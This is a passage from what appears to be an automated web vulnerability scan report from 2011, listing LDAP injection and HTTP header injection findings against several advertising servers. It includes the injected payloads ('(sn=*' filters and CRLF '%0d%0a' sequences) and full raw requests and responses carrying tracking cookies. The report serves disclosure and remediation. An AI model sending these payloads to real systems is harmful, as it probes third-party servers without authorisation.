vstcnt=417k020o01dfngheqnlsvaqf150v10l20r1w4exqe103210524qhoq103210524slly127p20f20g24exp6103210e249v4u10pj10e24ru4y103210722te10tq10a24f69z103210f24n86o103210d24pq44103210a24eflo218e104203210724na8i103210e24eyja103210e24f204103210524mqca103210e24nsyl103210f24l16a218e10f203210l24fz24103210924bgpn103210524o3dr103210l24cj2d103210224e1a9103210l24gqhl103210924d3rk10pj10m23sti21hj10a203210e24g197103210524ns52103210l24fqsv103210l24nnav103210f22wb11m520l20m24uzg6218e100203220020324tfmw103210b24flbl103210424qpgs103210324tc6l103210e24f5tg103210324tmhw103210924q8ci103210l24m4sm103210524elor218e10l203210m24uu1v103210m24f9wk103210i24jxig103210f24fvio218e20e20f203210f24uzpw218e10f203210l24eo2u103210624e8bw10321082496o0103210l24fsuv103210924fduc218e10a203210e24ef19103210l24uzdp103210b24dret103210724e9pa10321042451gt10pj10e24styu103210924cnyl103210g24er21103210m24o2lt103210a24fj52103210924m1v2103210a23eoh127p10l24f7qr218e108203210924fgv9218e108203210a24qnab103210023l4f103210a24kd6k103210c24hqyp103210i2

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=016020a0e0f0g0h1ljtllpxzt117vbjxzt1tr37xzt1tr37xzt117vbjxzt117rw8; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 16:10:21 GMT; Path=/
Set-Cookie: adh="1lkkxr8160a4ka20103r018twhJPTGt00gg5452rf011et018qzlZAsw500gg2f52rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh17vbj01p3n080k0s51b; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 16:10:21 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=40110tell1gx8000000013n01; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 16:10:21 GMT; Path=/
Set-Cookie: sglst=2280sbpelkxlm5026sw00f3m000k00500dsnlkxlm503vb300r3n080k0r50rarllkxlm503vb300r3n080k0r50rcg5lkxlm5026sw00r3n080k0r50r9rslkkpke0grcu0193n080k0s519am5lkkxr8002zw0123n080k0s512cd4lkxlm5026sw00f3m000k00500crglkxlm5026sw00r3n080k0r50rcnolkxlm5026sw00r3n080k0r50rabelkxlm5026sw00r3n080k0r50rdd8lkxlm5026sw00f3m000k00500cy2lkxlm5026sw00r3n080k0r50raoplkb5u209jqc0063e000j00500cnxlkxlm503s3e00r3n080k0r50re3qll1dpj0037p0043n040k04504bq3lkxlm5026sw00r3n080k0r50raoilkxlm503s3e00n3n000k00500bvplkxlm5026sw00f3m000k00500942lkb5u20mfs300o3l000k005009ullkxlm503s3e00n3n000k005008ndlkb5u20mfs300o3l000k00500bvclkxlm5026sw00r3n080k0r50rc5flkxlm5026sw00r3n080k0r50r56blkb5u20mfs300o3l000k00500bjqlkxlm5026sw00r3n080k0r50rawklkxlm5026sw00r3n080k0r50rasulkb5u209jqc0063e000j00500crplkxlm503s3e00n3n000k00500asqlkxlm5026sw00r3n080k0r50rc5rlkov6e0000000u3n080k0s50uaw8lkxlm503vb300r3n080k0r50rc60lkxlm5026sw00r3n080k0r50rdc4lkxlm5026sw00r3n080k0r50rd26lkxlm5026sw00r3n080k0r50rdnjlkxlm503vb300r3n080k0r50rcbclkxlm5026sw00r3n080k0r50rc85lkxlm5026sw00r3n080k0r50rcsslkxlm503vb300r3n08
...[SNIP]...

Request 2

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fwww.medicinenet.com%2fpink_eye%2farticle.htm HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt117s3uxzt1tr37xzt1tr37xzt117s3uxzt117rw8; adh=1lkkxr8160a4ka20103r018twhJPTGt00gg5452rf011et018qzlZAsw500gg2f52rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh17san01o3n070k0r51a; rdrlst=*)!(sn=*; sglst=2280sbpelkxlm5026sw00f3m000k00500dsnlkxlm503s3e00q3n070k0q50qarllkxlm503s3e00q3n070k0q50qcg5lkxlm5026sw00q3n070k0q50q9rslkkpke0go550183n070k0r518am5lkkxr8002zw0113n070k0r511cd4lkxlm5026sw00f3m000k00500crglkxlm5026sw00q3n070k0q50qcnolkxlm5026sw00q3n070k0q50qabelkxlm5026sw00q3n070k0q50qdd8lkxlm5026sw00f3m000k00500cy2lkxlm5026sw00q3n070k0q50qaoplkb5u209jqc0063e000j00500cnxlkxlm503s3e00q3n070k0q50qe3qll1dpj000000033n030k03503bq3lkxlm5026sw00q3n070k0q50qbvplkxlm5026sw00f3m000k00500aoilkxlm503s3e00n3n000k00500942lkb5u20mfs300o3l000k005008ndlkb5u20mfs300o3l000k005009ullkxlm503s3e00n3n000k00500bvclkxlm5026sw00q3n070k0q50qc5flkxlm5026sw00q3n070k0q50q56blkb5u20mfs300o3l000k00500bjqlkxlm5026sw00q3n070k0q50qawklkxlm5026sw00q3n070k0q50qasulkb5u209jqc0063e000j00500crplkxlm503s3e00n3n000k00500asqlkxlm5026sw00q3n070k0q50qc5rlkov6e0000000t3n070k0r50taw8lkxlm503s3e00q3n070k0q50qc60lkxlm5026sw00q3n070k0q50qdc4lkxlm5026sw00q3n070k0q50qd26lkxlm5026sw00q3n070k0q50qdnjlkxlm503s3e00q3n070k0q50qcbclkxlm5026sw00q3n070k0q50qc85lkxlm5026sw00q3n070k0q50qcsslkxlm503s3e00q3n070k0q50qc80lkb5u209jqc0063e000j00500ag2lkd7nq0o68m01d3n070k0r51ac1elkxlm5026sw00q3n070k0q50qc81lkkpke0cw1r00i3l000k005009grlkxlm5026sw00q3n070k0q50qc8flkxlm5026sw00q3n070k0q50qa6slkkpke0cw1r00i3l000k00500dnalkxlm5026sw00q3n070k0q50q9z6lkxlm5026sw00q3n070k0q50qdbtlkxlm5026sw00q3n070k0q50q9q4lkxlm5026sw00q3n070k0q50qdyllkxlm5026sw00q3n070k0q50q0kllklhm40c4010053l000k005009q5lkb5u20mfs300o3l000k00500b3zlkxlm503s3e00n3n000k005000t7ljyxb412gl801l3n070k0r51adgflkkpke0f2un0183n070k0r5189mjlkxlm5026sw00f3m000k00500bo0lkb5u20q7vh01b3n000k00500bo1lkkyy00cmo50093l000k005009pglkxlm5026sw00q3n070k0q50qcwalkxlm5026sw00q3n070k0q50qd86lklhm40c4010053l000k00500d84lkxlm5026sw00q3n070k0q50qdqllkxlm5026sw00q3n070k0q50qdz3lkxlm5026sw00f3m000k00500cm6lkxlm5026sw00q3n070k0q50qcxdlkxlm503s3e00q3n070k0q50q719lkb5u20omkz00w3n070k0q50r71alkkpke0cw1r00i3l000k00500ctplkxlm5026sw00q3n070k0q50qcc3lkxlm5026sw00q3n070k0q50qdgilkb5u209jqc0063e000j00500cthlkxlm5026sw00q3n070k0q50q4wclkb5u20q7vh00t3n000k005005mrlkb5u20mfs300o3l000k00500a0ulkxlm503s3e00n3n000k00500arilkxlm5026sw00f3m000k00500e0yll1dpj000000033n030k03503bwjlkkyy00gerj00z3n070k0r50zcbplkxlm5026sw00q3n070k0q50q9gelkxlm503s3e00n3n000k00500; vstcnt=417k020o01dfngheqnlsvaqf150v10l20r1w4exqe103210524qhoq103210524slly127p20f20g24exp6103210e249v4u10pj10e24ru4y103210722te10tq10a24f69z103210f24n86o103210d24pq44103210a24eflo218e104203210724na8i103210e24eyja103210e24f204103210524mqca103210e24nsyl103210f24l16a218e10f203210l24fz24103210924bgpn103210524o3dr103210l24cj2d103210224e1a9103210l24gqhl103210924d3rk10pj10m23sti21hj10a203210e24g197103210524ns52103210l24fqsv103210l24nnav103210f22wb11m520l20m24uzg6218e100203220020324tfmw103210b24flbl103210424qpgs103210324tc6l103210e24f5tg103210324tmhw103210924q8ci103210l24m4sm103210524elor218e10l203210m24uu1v103210m24f9wk103210i24jxig103210f24fvio218e20e20f203210f24uzpw218e10f203210l24eo2u103210624e8bw10321082496o0103210l24fsuv103210924fduc218e10a203210e24ef19103210l24uzdp103210b24dret103210724e9pa10321042451gt10pj10e24styu103210924cnyl103210g24er21103210m24o2lt103210a24fj52103210924m1v2103210a23eoh127p10l24f7qr218e108203210924fgv9218e108203210a24qnab103210023l4f103210a24kd6k103210c24hqyp103210i2

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh="1lkkxr8160a4ka20103r018twhJPTGt00gg5452rf011et018qzlZAsw500gg2f52rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh17vbl01p3n080k0s51b; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 16:10:22 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=40110tell1gxa000000013n01; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 16:10:22 GMT; Path=/
Set-Cookie: sglst=2280sbpelkxlm5026sw00f3m000k00500dsnlkxlm503s3e00r3n080k0r50rarllkxlm503s3e00r3n080k0r50rcg5lkxlm5026sw00r3n080k0r50r9rslkkpke0go550193n080k0s519am5lkkxr8002zw0123n080k0s512cd4lkxlm5026sw00f3m000k00500crglkxlm5026sw00r3n080k0r50rcnolkxlm5026sw00r3n080k0r50rabelkxlm5026sw00r3n080k0r50rdd8lkxlm5026sw00f3m000k00500cy2lkxlm5026sw00r3n080k0r50raoplkb5u209jqc0063e000j00500cnxlkxlm503s3e00r3n080k0r50re3qll1dpj000000043n040k04504bq3lkxlm5026sw00r3n080k0r50raoilkxlm503s3e00n3n000k00500bvplkxlm5026sw00f3m000k00500942lkb5u20mfs300o3l000k005009ullkxlm503s3e00n3n000k005008ndlkb5u20mfs300o3l000k00500bvclkxlm5026sw00r3n080k0r50rc5flkxlm5026sw00r3n080k0r50r56blkb5u20mfs300o3l000k00500bjqlkxlm5026sw00r3n080k0r50rawklkxlm5026sw00r3n080k0r50rasulkb5u209jqc0063e000j00500crplkxlm503s3e00n3n000k00500asqlkxlm5026sw00r3n080k0r50rc5rlkov6e0000000u3n080k0s50uaw8lkxlm503s3e00r3n080k0r50rc60lkxlm5026sw00r3n080k0r50rdc4lkxlm5026sw00r3n080k0r50rd26lkxlm5026sw00r3n080k0r50rdnjlkxlm503s3e00r3n080k0r50rcbclkxlm5026sw00r3n080k0r50rc85lkxlm5026sw00r3n080k0r50rcsslkxlm503s3e00r3n080k0r50rc80lkb5u209jqc0063e000j00500ag2lkd7nq0o99k01e3n080k0s51bc1elkxlm5026sw00r3n080k0r50rc81lkkpke0cw1r00i3l000k005009grlkxlm5026sw00r3n080k0r50rc8flkxlm5
...[SNIP]...

3.3. http://data.cmcore.com/imp [ci parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://data.cmcore.com
Path:   /imp

Issue detail

The ci parameter appears to be vulnerable to LDAP injection attacks.

The payloads 1256ff2a1955010e)(sn=* and 1256ff2a1955010e)!(sn=* were each submitted in the ci parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /imp?tid=17&ci=1256ff2a1955010e)(sn=*&vn1=4.1.1&vn2=e4.0&ec=UTF-8&cm_mmc=IM_Display-_-x-_-x15off-_-postvday&cm_mmca1=300x250&cm_mmca2=300x250_8F_Interim_finalgif&cm_mmca3=postvday&cm_mmca4=25K&cvdone=s HTTP/1.1
Host: data.cmcore.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/ab?enc=AAAAAAAA-D9uEoPAyiH1PwAAAAAAAPg_bhKDwMoh9T8AAAAAAAD4PzGYU0zCzH1PSsYda6b2ziVcpMpNAAAAAAkOAAA4AAAAZAEAAAIAAABT_gQAd2MAAAEAAABVU0QAVVNEACwB-gBEIKsBSgQBAQUCAAQAAAAAuhw03wAAAAA.&tt_code=7681b4f5-7a3b-407a-961f-c43e051f5d06&udj=uf%28%27a%27%2C+10005%2C+1305125980%29%3Buf%28%27c%27%2C+47078%2C+1305125980%29%3Buf%28%27r%27%2C+327251%2C+1305125980%29%3Bppv%289163%2C+%275727959435961407537%27%2C+1305125980%2C+1305298780%2C+47078%2C+25463%29%3B&cnd=!Oh2hZAjm7wIQ0_wTGAAg98YBMAA4xEBAAEjkAlAAWABg2gFoAHBSePYtgAFUiAGOGJABAZgBAaABA6gBA7ABAbkBAAAAAAAA-D_BAQAAAAAAAPg_yQH-25QZ8rDSP9ABAA..&ccd=!yAWkMAjm7wIQ0_wTGPfGASAA&referrer=www.foxaudiencenetwork.com&custom_macro=ADV_CODE%5E17572%5ECP_CODE%5EH26G%5ECP_ID%5E47078%5ESEG_CODES%5EH26G-8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=70091303843240316067555; TestSess3=x

Response 1

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:43:09 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 1256ff2a1955010e)(sn=*_login=130512858901678387301256ff2a1955010e)(sn=*; path=/
Set-Cookie: 1256ff2a1955010e)(sn=*_reset=1305128589;path=/
Expires: Tue, 10 May 2011 21:43:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

Request 2

GET /imp?tid=17&ci=1256ff2a1955010e)!(sn=*&vn1=4.1.1&vn2=e4.0&ec=UTF-8&cm_mmc=IM_Display-_-x-_-x15off-_-postvday&cm_mmca1=300x250&cm_mmca2=300x250_8F_Interim_finalgif&cm_mmca3=postvday&cm_mmca4=25K&cvdone=s HTTP/1.1
Host: data.cmcore.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/ab?enc=AAAAAAAA-D9uEoPAyiH1PwAAAAAAAPg_bhKDwMoh9T8AAAAAAAD4PzGYU0zCzH1PSsYda6b2ziVcpMpNAAAAAAkOAAA4AAAAZAEAAAIAAABT_gQAd2MAAAEAAABVU0QAVVNEACwB-gBEIKsBSgQBAQUCAAQAAAAAuhw03wAAAAA.&tt_code=7681b4f5-7a3b-407a-961f-c43e051f5d06&udj=uf%28%27a%27%2C+10005%2C+1305125980%29%3Buf%28%27c%27%2C+47078%2C+1305125980%29%3Buf%28%27r%27%2C+327251%2C+1305125980%29%3Bppv%289163%2C+%275727959435961407537%27%2C+1305125980%2C+1305298780%2C+47078%2C+25463%29%3B&cnd=!Oh2hZAjm7wIQ0_wTGAAg98YBMAA4xEBAAEjkAlAAWABg2gFoAHBSePYtgAFUiAGOGJABAZgBAaABA6gBA7ABAbkBAAAAAAAA-D_BAQAAAAAAAPg_yQH-25QZ8rDSP9ABAA..&ccd=!yAWkMAjm7wIQ0_wTGPfGASAA&referrer=www.foxaudiencenetwork.com&custom_macro=ADV_CODE%5E17572%5ECP_CODE%5EH26G%5ECP_ID%5E47078%5ESEG_CODES%5EH26G-8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=70091303843240316067555; TestSess3=x

Response 2

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:43:09 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 1256ff2a1955010e)!(sn=*_login=130512858900671754341256ff2a1955010e)!(sn=*; path=/
Set-Cookie: 1256ff2a1955010e)!(sn=*_reset=1305128589;path=/
Expires: Tue, 10 May 2011 21:43:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

3.4. http://oascentral.blogher.org/RealMedia/ads/adstream_jx.ads/blogher.org.parenting.mybeautifulday/2011/05/pink-eye-html/@Middle,Left!Middle [OAX cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://oascentral.blogher.org
Path:   /RealMedia/ads/adstream_jx.ads/blogher.org.parenting.mybeautifulday/2011/05/pink-eye-html/@Middle,Left!Middle

Issue detail

The OAX cookie appears to be vulnerable to LDAP injection attacks.

The payloads 958f3dcd543435f8)(sn=* and 958f3dcd543435f8)!(sn=* were each submitted in the OAX cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /RealMedia/ads/adstream_jx.ads/blogher.org.parenting.mybeautifulday/2011/05/pink-eye-html/@Middle,Left!Middle?p6426&p6402&p6359&p6346&p6411&p6443&p6444&p6445&p6461&p6460&p6456&p6447&p6448&p6462&all&optanimal&optprocessedfood&optgluten&optreproductivehealth&optparenting&optformula&optmilitary&opttvfilms&optfinance&optoilauto&optantibreastfeeding&optwalmart&optdisney&optnestle&optdemocrats&optreligious&optrepublicans&optfastfood&opthouseads&optpsa&optrichmedia&url=/2011/05/pink-eye-html HTTP/1.1
Host: oascentral.blogher.org
Proxy-Connection: keep-alive
Referer: http://www.mybeautifulday.net/2011/05/pink-eye.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=958f3dcd543435f8)(sn=*; NSC_d15efm_qppm_iuuq=ffffffff09499e5745525d5f4f58455e445a4a423660

Response 1

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:36:11 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW803KrOsACm6n; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.blogher.org
Set-Cookie: RMFD=011QKBSNO2020BNt; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.blogher.org
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3241
Content-Type: application/x-javascript
Set-Cookie: NSC_d15efm_qppm_iuuq=ffffffff09419e4745525d5f4f58455e445a4a423660;path=/;httponly

document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('        \n');
document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('<script type="text/javascript">\n');
document.write ('//<![CDATA[\n');
document.write ('var filePath = "http://imagec15.247realmedia.com/RealMedia/ads/Creatives/BlogHer/Gaylord_May11_Parenting_National/GN-Birthday-Banners-160x600.swf/1304107859";\n');
document.write ('var TFSMFlash_PRETAG = "";\n');
document.write ('var TFSMFlash_POSTTAG = "";\n');
document.write ('var TFSMFlash_VERSION = "9";\n');
document.write ('var TFSMFlash_WMODE = "window";\n');
document.write ('\n');
document.write ('            var TFSMFlash_OASCLICK = "http://oascentral.blogher.org/RealMedia/ads/click_lx.ads/blogher.org.parenting.mybeautifulday/2011/05/pink-eye-html/L36/1307121125/Middle/BlogHer/Gaylord_May11_Parenting_National/Gaylord_May11_Parenting_National_160.html/726348573830334b724f7341436d366e";\n');
document.write ('    \n');
document.write ('\n');
document.write ('\n');
document.write ('var TFSMFlash_SWFCLICKVARIABLE = "?clickTAG="+TFSMFlash_OASCLICK + "";\n');
document.write ('var TFSMFlash_SWFFILE = filePath + TFSMFlash_SWFCLICKVARIABLE;\n');
document.write ('var TFSMFlash_FSCOMMAND = "";\n');
document.write ('var TFSMFlash_IMAGEALTERNATE = "http://imagec15.247realmedia.com/RealMedia/ads/Creatives/BlogHer/Gaylord_May11_Parenting_National/GN-Birthday-Banners-160x600.jpg/130410785
...[SNIP]...

Request 2

GET /RealMedia/ads/adstream_jx.ads/blogher.org.parenting.mybeautifulday/2011/05/pink-eye-html/@Middle,Left!Middle?p6426&p6402&p6359&p6346&p6411&p6443&p6444&p6445&p6461&p6460&p6456&p6447&p6448&p6462&all&optanimal&optprocessedfood&optgluten&optreproductivehealth&optparenting&optformula&optmilitary&opttvfilms&optfinance&optoilauto&optantibreastfeeding&optwalmart&optdisney&optnestle&optdemocrats&optreligious&optrepublicans&optfastfood&opthouseads&optpsa&optrichmedia&url=/2011/05/pink-eye-html HTTP/1.1
Host: oascentral.blogher.org
Proxy-Connection: keep-alive
Referer: http://www.mybeautifulday.net/2011/05/pink-eye.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=958f3dcd543435f8)!(sn=*; NSC_d15efm_qppm_iuuq=ffffffff09499e5745525d5f4f58455e445a4a423660

Response 2

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:36:12 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW803KrOwACrCH; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.blogher.org
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3241
Content-Type: application/x-javascript
Set-Cookie: NSC_d15efm_qppm_iuuq=ffffffff09419e4845525d5f4f58455e445a4a423660;path=/;httponly

document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('        \n');
document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('<script type="text/javascript">\n');
document.write ('//<![CDATA[\n');
document.write ('var filePath = "http://imagec15.247realmedia.com/RealMedia/ads/Creatives/BlogHer/Gaylord_May11_Parenting_National/GN-Birthday-Banners-160x600.swf/1304107859";\n');
document.write ('var TFSMFlash_PRETAG = "";\n');
document.write ('var TFSMFlash_POSTTAG = "";\n');
document.write ('var TFSMFlash_VERSION = "9";\n');
document.write ('var TFSMFlash_WMODE = "window";\n');
document.write ('\n');
document.write ('            var TFSMFlash_OASCLICK = "http://oascentral.blogher.org/RealMedia/ads/click_lx.ads/blogher.org.parenting.mybeautifulday/2011/05/pink-eye-html/L36/1443930356/Middle/BlogHer/Gaylord_May11_Parenting_National/Gaylord_May11_Parenting_National_160.html/726348573830334b724f774143724348";\n');
document.write ('    \n');
document.write ('\n');
document.write ('\n');
document.write ('var TFSMFlash_SWFCLICKVARIABLE = "?clickTAG="+TFSMFlash_OASCLICK + "";\n');
document.write ('var TFSMFlash_SWFFILE = filePath + TFSMFlash_SWFCLICKVARIABLE;\n');
document.write ('var TFSMFlash_FSCOMMAND = "";\n');
document.write ('var TFSMFlash_IMAGEALTERNATE = "http://imagec15.247realmedia.com/RealMedia/ads/Creatives/BlogHer/Gaylord_May11_Parenting_National/GN-Birthday-Banners-160x600.jpg/1304107859";\n');
document.write ('\n');
document.write ('\n');
document.write ('var TFSMFlash_OASALTTEXT
...[SNIP]...

4. HTTP header injection  previous  next
There are 42 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


4.1. http://ad.doubleclick.net/ad/N5019.252469.POPSUGAR.COM/B5379556.47 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N5019.252469.POPSUGAR.COM/B5379556.47

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6e3c2%0d%0a65def4a44aa was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6e3c2%0d%0a65def4a44aa/N5019.252469.POPSUGAR.COM/B5379556.47;sz=1x1;ord=5086674? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.tressugar.com/Cannes-Film-Festival-History-16415520
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6e3c2
65def4a44aa
/N5019.252469.POPSUGAR.COM/B5379556.47;sz=1x1;ord=5086674:
Date: Wed, 11 May 2011 15:00:19 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.2. http://ad.doubleclick.net/ad/N6374.137661.GLAM/B5287030.24 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N6374.137661.GLAM/B5287030.24

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7e8c2%0d%0a6e91c4497ec was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7e8c2%0d%0a6e91c4497ec/N6374.137661.GLAM/B5287030.24;sz=1x1;ord=4dcaa38a6d0a5? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.shefinds.com/2011/cannes-film-festival-begins-today-time-to-reflect-on-last-years-best-dressed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
